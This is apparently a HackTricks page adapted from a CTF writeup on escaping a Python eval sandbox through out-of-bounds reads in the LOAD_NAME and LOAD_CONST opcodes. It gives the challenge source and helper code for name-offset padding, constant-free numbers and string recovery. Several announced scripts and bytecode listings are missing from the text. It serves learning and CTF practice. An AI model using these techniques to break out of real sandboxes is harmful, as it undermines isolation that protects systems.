LOAD_NAME / LOAD_CONST opcode OOB Read
Learn & practice AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking:
HackTricks Training GCP Red Team Expert (GRTE)
This info was taken from this writeup.
TL;DR
We can use the OOB read "feature" of the LOAD_NAME / LOAD_CONST opcodes to fetch a symbol that already sits in memory. In practice this means using a trick like (a, b, c, ... hundreds of symbols ..., __getattribute__) if [] else [].__getattribute__(...) to get the symbol (such as a function name) you want.
Then just craft your exploit.
Overview
The source code is pretty short: it contains only 4 lines!
source = input('>>> ')
if len(source) > 13337: exit(print(f"{'L':O<13337}NG"))
code = compile(source, '∅', 'eval').replace(co_consts=(), co_names=())
print(eval(code, {'__builtins__': {}}))
You can input arbitrary Python code, and it is compiled into a Python code object. However, the co_consts and co_names of that code object are replaced with empty tuples before the code object is evaluated.
As a result, any expression that contains consts (e.g. numbers, strings) or names (e.g. variables, functions) may end in a segmentation fault.
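To make the effect of the replace call concrete, here is a minimal sketch that compiles an expression the same way the challenge does and compares the code object before and after. The filename '<demo>' and the variable names are illustrative assumptions. The stripped code object is deliberately never evaluated, since doing so is exactly what may crash the interpreter.

```python
# Compile an expression as the challenge does, but never eval the result.
source = "[a, b, c]"
original = compile(source, "<demo>", "eval")

# Same call as in the challenge: only the two tuples are swapped out.
stripped = original.replace(co_consts=(), co_names=())

print(original.co_names)                      # names the bytecode indexes into
print(stripped.co_names)                      # now an empty tuple
print(original.co_code == stripped.co_code)   # the bytecode itself is untouched
```

The bytecode still carries the old indices, while the tuples they point into are empty.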
Out of Bound Read
How does the segfault happen?
Let's start with a simple example: [a, b, c] could compile into the following bytecode.
But what if co_names becomes an empty tuple? The LOAD_NAME 2 opcode is still executed and tries to read a value from the memory address where that entry would originally have been. Yes, this is an out-of-bounds read "feature".
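The bytecode for this example can be inspected with the standard dis module. The sketch below lists only the LOAD_NAME instructions, because the surrounding opcodes differ between Python versions. The '<demo>' filename is an arbitrary placeholder.

```python
import dis

code = compile("[a, b, c]", "<demo>", "eval")

# Keep only the LOAD_NAME instructions: (index into co_names, resolved name).
load_names = [
    (ins.arg, ins.argval)
    for ins in dis.get_instructions(code)
    if ins.opname == "LOAD_NAME"
]

for index, name in load_names:
    print(f"LOAD_NAME {index} ({name})")
```

Each name is referenced by its position in co_names, not by its text.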
The core concept of the solution is simple. Some CPython opcodes, for example LOAD_NAME and LOAD_CONST, are vulnerable (?) to OOB reads.
They retrieve the object at index oparg from the consts or names tuple (that is what co_consts and co_names are called under the hood). We can refer to the following short snippet about LOAD_CONST to see what CPython does when it processes the LOAD_CONST opcode.
In this way we can use the OOB feature to get a "name" from an arbitrary memory offset. To find out which names are available and at which offsets, just keep trying LOAD_NAME 0, LOAD_NAME 1 ... LOAD_NAME 99 ... You should find something at around oparg > 700. You can also use gdb to look at the memory layout, of course, but I don't think that would be any easier.
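As a rough mental model only (CPython's real implementation is C, and none of the names below come from it), the lookup can be pictured as "base address plus index" with no length check, assuming the behaviour is as the text describes. The memory list, unchecked_get and the junk entries are all made up for illustration.

```python
# Toy model: one flat list stands in for process memory.
memory = ["<junk 0>", "<junk 1>", "<junk 2>", "<junk 3>", "<junk 4>",
          "__getattribute__"]

def unchecked_get(base, index):
    """Mimic an item lookup that adds the index to a base with no bounds check."""
    return memory[base + index]

names_base = 0     # hypothetical location where the names tuple's items start
names_length = 0   # the tuple is empty after .replace(co_names=())

# The index is never compared against names_length, so index 5 still "works".
leaked = unchecked_get(names_base, 5)
print(names_length, leaked)
```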
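Probing offsets above 255 by hand requires an EXTENDED_ARG prefix, because each instruction carries only one argument byte. The helper below is a sketch of just that encoding step; encode_load_name is a hypothetical name, not taken from the writeup. Wrapping the bytes into a code object is version-specific and is left out here. Since a bad offset can crash the interpreter, each probe is probably best run in its own process.

```python
from opcode import opmap

def encode_load_name(n):
    """Return wordcode bytes for LOAD_NAME n, prefixed with EXTENDED_ARG if n > 255."""
    if n < 0:
        raise ValueError("oparg must be non-negative")
    low = n & 0xFF
    rest = n >> 8
    high_bytes = []
    while rest:
        high_bytes.append(rest & 0xFF)
        rest >>= 8
    out = []
    # EXTENDED_ARG instructions supply the higher bytes, most significant first.
    for byte in reversed(high_bytes):
        out += [opmap["EXTENDED_ARG"], byte]
    out += [opmap["LOAD_NAME"], low]
    return bytes(out)

print(encode_load_name(5).hex())
print(encode_load_name(700).hex())
```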
Generating the Exploit
Once we retrieve those useful offsets for names / consts, how do we get a name / const from that offset and use it? Here is a trick for you:
Let's assume we can get a __getattribute__ name from offset 5 (LOAD_NAME 5) with co_names=(), then just do the following:
Notice that it is not necessary to name it __getattribute__; you can use something shorter or weirder.
You can understand why by looking at its bytecode:
Notice that LOAD_ATTR also retrieves its name from co_names. Python loads a name from the same offset whenever the name is the same, so the second __getattribute__ is still loaded from offset 5. Using this feature, we can use an arbitrary name as long as that name is somewhere in nearby memory.
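The trick can be sketched as a small generator that pads with throwaway names until the wanted name lands at the desired index. build_name_trick and the _0, _1, ... filler names are illustrative assumptions. The snippet only compiles the expression and inspects co_names; it does not evaluate anything.

```python
def build_name_trick(name, offset):
    """Build an expression in which `name` sits at index `offset` of co_names."""
    fillers = [f"_{i}" for i in range(offset)]   # distinct dummy names
    names = ", ".join(fillers + [name])
    # `[]` is falsy, so the padded tuple is never evaluated at run time;
    # it exists only to push `name` to the wanted index.
    return f"({names}) if [] else [].{name}"

src = build_name_trick("__getattribute__", 5)
code = compile(src, "<demo>", "eval")
print(src)
print(code.co_names.index("__getattribute__"))

# The spelling is irrelevant once co_names is emptied; only the index matters.
alias = compile(build_name_trick("g", 5), "<demo>", "eval")
print(alias.co_names.index("g"))
```

Both the tuple element and the attribute access share one co_names entry, which is why the attribute lookup ends up reading the same offset.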
Generating numbers should be trivial:
0: not [[]]
1: not []
2: (not []) + (not [])
...
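The pattern above generalises to any non-negative integer. The sketch below builds such an expression and checks with dis that the compiled code contains no LOAD_* instruction at all, so it touches neither consts nor names. number_expr and uses_loads are hypothetical helper names. The expression grows linearly with n, which matters given the length limit.

```python
import dis

def number_expr(n):
    """Return a constant-free expression that evaluates to n (n >= 0)."""
    if n < 0:
        raise ValueError("only non-negative integers are handled in this sketch")
    if n == 0:
        return "not [[]]"                     # False, which equals 0
    return " + ".join(["(not [])"] * n)       # True + True + ... (n times)

def uses_loads(expr):
    """True if the compiled expression contains any LOAD_* instruction."""
    code = compile(expr, "<demo>", "eval")
    return any(ins.opname.startswith("LOAD_") for ins in dis.get_instructions(code))

for n in range(4):
    print(n, "->", number_expr(n))
```

For 0 and 1 the result is a bool rather than an int, but bools compare equal to 0 and 1 and can be used as indexes.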
Exploit Script
I didn't use consts due to the length limit.
First, here is a script for finding the offsets of those names.
And the following generates the real Python exploit.
It basically does the following things; the strings it needs are obtained from the __dir__ method:
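The __dir__ part can be illustrated on its own. This is only a sketch of the idea, not the writeup's generator: __dir__() returns a list of attribute-name strings, so a string can be picked out by index instead of being written as a literal. The position of each name varies between Python versions, so the index is looked up here rather than hard-coded. In a real payload that index would itself have to be a constant-free number.

```python
# Attribute names of a list, as plain strings.
attrs = [].__dir__()

# The literal below is used only offline, to discover the index.
idx = attrs.index("__class__")

# Inside the sandbox the string would be recovered purely by indexing.
recovered = attrs[idx]

# The recovered string can then be passed to __getattribute__.
cls = [].__getattribute__(recovered)
print(idx, recovered, cls)
```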